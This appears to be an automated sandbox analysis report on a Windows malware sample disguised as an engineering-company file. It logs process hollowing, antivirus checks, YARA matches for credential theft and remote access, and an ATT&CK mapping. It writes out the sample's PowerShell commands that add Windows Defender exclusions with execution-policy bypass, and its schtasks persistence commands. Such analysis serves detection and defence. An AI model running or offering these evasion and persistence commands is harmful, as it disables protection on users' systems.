              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Thread delayed: delay time: 922337203685477
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4523604892.000000000160A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Memory written: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Memory written: C:\Users\user\AppData\Roaming\RTUZKYTc.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Memory written: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe Process created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Queries volume information: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeQueries volume information: C:\Users\user\AppData\Roaming\RTUZKYTc.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Queries volume information: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4548014985.00000000070FF000.00000004.00000020.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4548014985.00000000070E0000.00000004.00000020.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4523604892.000000000160A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4548014985.00000000070E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: er\MsMpeng.exe
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

Source: Yara match; File source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 5148, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RTUZKYTc.exe PID: 7324, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RTUZKYTc.exe PID: 7728, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 1992, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 7320, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match; File source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 5148, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RTUZKYTc.exe PID: 7324, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RTUZKYTc.exe PID: 7728, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 1992, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 7320, type: MEMORYSTR
ATT&CK matrix, listed by tactic (digits in brackets are the signature-count markers shown next to a technique in the original matrix; techniques without a marker are the matrix's default entries and were not observed):

• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
• Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
• Execution: Windows Management Instrumentation [1]; Scheduled Task/Job [1]; PowerShell [1]; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
• Persistence: Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [21]; DLL Side-Loading [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
• Privilege Escalation: Process Injection [111]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [21]; DLL Side-Loading [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
• Defense Evasion: Masquerading [1]; Disable or Modify Tools [11]; Virtualization/Sandbox Evasion [31]; Process Injection [111]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [22]; DLL Side-Loading [1]
• Credential Access: Input Capture [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
